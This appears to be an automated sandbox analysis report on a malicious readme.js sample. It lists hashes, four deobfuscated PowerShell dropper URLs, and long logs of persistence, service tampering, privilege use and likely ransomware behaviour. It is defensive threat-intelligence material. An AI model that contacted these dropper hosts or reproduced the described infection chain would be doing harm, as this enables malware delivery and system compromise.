d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7v20201028
submitted
13-01-2021 06:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

readme.js
Size

10KB
MD5

db49b6f1f379122685be9553c5cc0f37
SHA1

45788a5c0c0d97d9bed9c0e6115eca1edbad8ba6
SHA256

d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09
SHA512

1eae9f302d90b3a1887b9f74927bf9bfac0519ae0f4019497177eca3ac2086ed71b4296193bcf62ba493d7fe2e4d57f42ded79ed5e8789abca206a2185ebab23

Score

10^/10

evasion

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.zz3r0.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.zer9g.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.bb3u9.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.bb3u9.com

Signatures

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.EXE

flow	pid	process
7	1976	powershell.exe
19	2640	powershell.EXE
23	1900	powershell.EXE
25	1900	powershell.EXE
38	2612	powershell.EXE
40	2612	powershell.EXE
41	2640	powershell.EXE
44	2640	powershell.EXE

Executes dropped EXE 3 IoCs

Processes:

0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exe

pid process

3016 0MSJ3Ad6IVD.exe
1536 0MSJ3Ad6IVD.exe
2084 0MSJ3Ad6IVD.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Disabling Security Tools
T1089

Service Stop
T1489
Loads dropped DLL 7 IoCs

Processes:

cmd.exetaskmgr.exe

pid process

2012 cmd.exe
2776 taskmgr.exe
2776 taskmgr.exe
2776 taskmgr.exe
2776 taskmgr.exe
2776 taskmgr.exe
2776 taskmgr.exe

pid	process
3016	0MSJ3Ad6IVD.exe
1536	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe

pid	process
2012	cmd.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe

Drops file in System32 directory 89 IoCs

Processes:

0MSJ3Ad6IVD.exepowershell.EXEpowershell.EXEpowershell.EXE0MSJ3Ad6IVD.exepowershell.EXE0MSJ3Ad6IVD.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bddef163-7995-45d6-82ae-d30c260f4fa2	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01748f9b-7dda-4310-a8ad-a0d6c6409f28	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de49895d-8b72-4a81-86db-ca55df7e149b	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef90329b-70a1-42dd-a725-d58367a78736	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7e321290-caea-4fb9-a887-5a15cfd6f8ab	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46f982f5-c0e7-4773-a194-f3dbd533d73f	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff5a6a98-3740-4044-84a4-40537bdb49ba	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_49055437-0d59-46a2-8397-246c631f7853	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff5a6a98-3740-4044-84a4-40537bdb49ba	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de89cd22-7d80-451a-a9b1-7602e398f466	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_12a6dc08-011e-48d9-922f-94fd833c93f5	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff5a6a98-3740-4044-84a4-40537bdb49ba	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4575b320-65b5-40d1-9a51-5be8450eae69	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46f982f5-c0e7-4773-a194-f3dbd533d73f	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46f982f5-c0e7-4773-a194-f3dbd533d73f	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce2f09c4-fd4a-416e-a488-3c67839e867e	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_01748f9b-7dda-4310-a8ad-a0d6c6409f28	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b538283-ef7e-4012-b5d8-4f734729b191	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff5a6a98-3740-4044-84a4-40537bdb49ba	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70025f27-afd3-4d53-90dd-c5e37330fd10	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5da3730f-c7df-4ed3-9667-ee2bb4d06e01	0MSJ3Ad6IVD.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_939ae3d9-b1d5-4ced-843a-883413932aac	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69dd8ff9-fe3f-4169-9aa4-a9c197c81623	powershell.EXE

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2412 schtasks.exe
2516 schtasks.exe
2764 schtasks.exe
928 schtasks.exe
2084 schtasks.exe
3056 schtasks.exe
2564 schtasks.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXE

pid process

2828 NETSTAT.EXE

pid	process
2412	schtasks.exe
2516	schtasks.exe
2764	schtasks.exe
928	schtasks.exe
2084	schtasks.exe
3056	schtasks.exe
2564	schtasks.exe

pid	process
2828	NETSTAT.EXE

Modifies data under HKEY_USERS 10 IoCs

Processes:

0MSJ3Ad6IVD.exepowershell.EXEpowershell.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	0MSJ3Ad6IVD.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20e915d078e9d601	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	0MSJ3Ad6IVD.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	0MSJ3Ad6IVD.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1980 notepad.exe

pid	process
1980	notepad.exe

Suspicious behavior: EnumeratesProcesses 121 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.EXE0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exe0MSJ3Ad6IVD.exepowershell.EXEpowershell.exe

pid	process
1976	powershell.exe
1976	powershell.exe
2328	powershell.EXE
2328	powershell.EXE
2640	powershell.EXE
2640	powershell.EXE
1900	powershell.EXE
1900	powershell.EXE
3016	0MSJ3Ad6IVD.exe
1536	0MSJ3Ad6IVD.exe
1536	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
3016	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2612	powershell.EXE
2612	powershell.EXE
3028	powershell.exe
3028	powershell.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe
2084	0MSJ3Ad6IVD.exe

Suspicious use of AdjustPrivilegeToken 296 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeIncreaseQuotaPrivilege	1940	WMIC.exe
Token: SeSecurityPrivilege	1940	WMIC.exe
Token: SeTakeOwnershipPrivilege	1940	WMIC.exe
Token: SeLoadDriverPrivilege	1940	WMIC.exe
Token: SeSystemProfilePrivilege	1940	WMIC.exe
Token: SeSystemtimePrivilege	1940	WMIC.exe
Token: SeProfSingleProcessPrivilege	1940	WMIC.exe
Token: SeIncBasePriorityPrivilege	1940	WMIC.exe
Token: SeCreatePagefilePrivilege	1940	WMIC.exe
Token: SeBackupPrivilege	1940	WMIC.exe
Token: SeRestorePrivilege	1940	WMIC.exe
Token: SeShutdownPrivilege	1940	WMIC.exe
Token: SeDebugPrivilege	1940	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1940	WMIC.exe
Token: SeRemoteShutdownPrivilege	1940	WMIC.exe
Token: SeUndockPrivilege	1940	WMIC.exe
Token: SeManageVolumePrivilege	1940	WMIC.exe
Token: 33	1940	WMIC.exe
Token: 34	1940	WMIC.exe
Token: 35	1940	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1904	WMIC.exe
Token: SeSecurityPrivilege	1904	WMIC.exe
Token: SeTakeOwnershipPrivilege	1904	WMIC.exe
Token: SeLoadDriverPrivilege	1904	WMIC.exe
Token: SeSystemProfilePrivilege	1904	WMIC.exe
Token: SeSystemtimePrivilege	1904	WMIC.exe
Token: SeProfSingleProcessPrivilege	1904	WMIC.exe
Token: SeIncBasePriorityPrivilege	1904	WMIC.exe
Token: SeCreatePagefilePrivilege	1904	WMIC.exe
Token: SeBackupPrivilege	1904	WMIC.exe
Token: SeRestorePrivilege	1904	WMIC.exe
Token: SeShutdownPrivilege	1904	WMIC.exe
Token: SeDebugPrivilege	1904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1904	WMIC.exe
Token: SeRemoteShutdownPrivilege	1904	WMIC.exe
Token: SeUndockPrivilege	1904	WMIC.exe
Token: SeManageVolumePrivilege	1904	WMIC.exe
Token: 33	1904	WMIC.exe
Token: 34	1904	WMIC.exe
Token: 35	1904	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1320	WMIC.exe
Token: SeSecurityPrivilege	1320	WMIC.exe
Token: SeTakeOwnershipPrivilege	1320	WMIC.exe
Token: SeLoadDriverPrivilege	1320	WMIC.exe
Token: SeSystemProfilePrivilege	1320	WMIC.exe
Token: SeSystemtimePrivilege	1320	WMIC.exe
Token: SeProfSingleProcessPrivilege	1320	WMIC.exe
Token: SeIncBasePriorityPrivilege	1320	WMIC.exe
Token: SeCreatePagefilePrivilege	1320	WMIC.exe
Token: SeBackupPrivilege	1320	WMIC.exe
Token: SeRestorePrivilege	1320	WMIC.exe
Token: SeShutdownPrivilege	1320	WMIC.exe
Token: SeDebugPrivilege	1320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1320	WMIC.exe
Token: SeRemoteShutdownPrivilege	1320	WMIC.exe
Token: SeUndockPrivilege	1320	WMIC.exe
Token: SeManageVolumePrivilege	1320	WMIC.exe
Token: 33	1320	WMIC.exe
Token: 34	1320	WMIC.exe
Token: 35	1320	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1992	WMIC.exe
Token: SeSecurityPrivilege	1992	WMIC.exe
Token: SeTakeOwnershipPrivilege	1992	WMIC.exe

Suspicious use of FindShellTrayWindow 58 IoCs

Processes:

taskmgr.exe

pid	process
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe
2776	taskmgr.exe

Suspicious use of WriteProcessMemory 924 IoCs

Processes:

wscript.execmd.exepowershell.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2024 wrote to memory of 1184	2024	wscript.exe	cmd.exe
PID 2024 wrote to memory of 1184	2024	wscript.exe	cmd.exe
PID 2024 wrote to memory of 1184	2024	wscript.exe	cmd.exe
PID 1184 wrote to memory of 1980	1184	cmd.exe	notepad.exe
PID 1184 wrote to memory of 1980	1184	cmd.exe	notepad.exe
PID 1184 wrote to memory of 1980	1184	cmd.exe	notepad.exe
PID 1184 wrote to memory of 1976	1184	cmd.exe	powershell.exe
PID 1184 wrote to memory of 1976	1184	cmd.exe	powershell.exe
PID 1184 wrote to memory of 1976	1184	cmd.exe	powershell.exe
PID 1976 wrote to memory of 920	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 920	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 920	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1812	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1812	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1812	1976	powershell.exe	cmd.exe
PID 1812 wrote to memory of 1904	1812	cmd.exe	WMIC.exe
PID 1812 wrote to memory of 1904	1812	cmd.exe	WMIC.exe
PID 1812 wrote to memory of 1904	1812	cmd.exe	WMIC.exe
PID 1976 wrote to memory of 272	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 272	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 272	1976	powershell.exe	cmd.exe
PID 272 wrote to memory of 1940	272	cmd.exe	WMIC.exe
PID 272 wrote to memory of 1940	272	cmd.exe	WMIC.exe
PID 272 wrote to memory of 1940	272	cmd.exe	WMIC.exe
PID 1976 wrote to memory of 1120	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1120	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1120	1976	powershell.exe	cmd.exe
PID 1120 wrote to memory of 1320	1120	cmd.exe	WMIC.exe
PID 1120 wrote to memory of 1320	1120	cmd.exe	WMIC.exe
PID 1120 wrote to memory of 1320	1120	cmd.exe	WMIC.exe
PID 1976 wrote to memory of 1912	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1912	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1912	1976	powershell.exe	cmd.exe
PID 1912 wrote to memory of 1992	1912	cmd.exe	WMIC.exe
PID 1912 wrote to memory of 1992	1912	cmd.exe	WMIC.exe
PID 1912 wrote to memory of 1992	1912	cmd.exe	WMIC.exe
PID 1976 wrote to memory of 1236	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1236	1976	powershell.exe	cmd.exe
PID 1976 wrote to memory of 1236	1976	powershell.exe	cmd.exe
PID 1236 wrote to memory of 1608	1236	cmd.exe	WMIC.exe
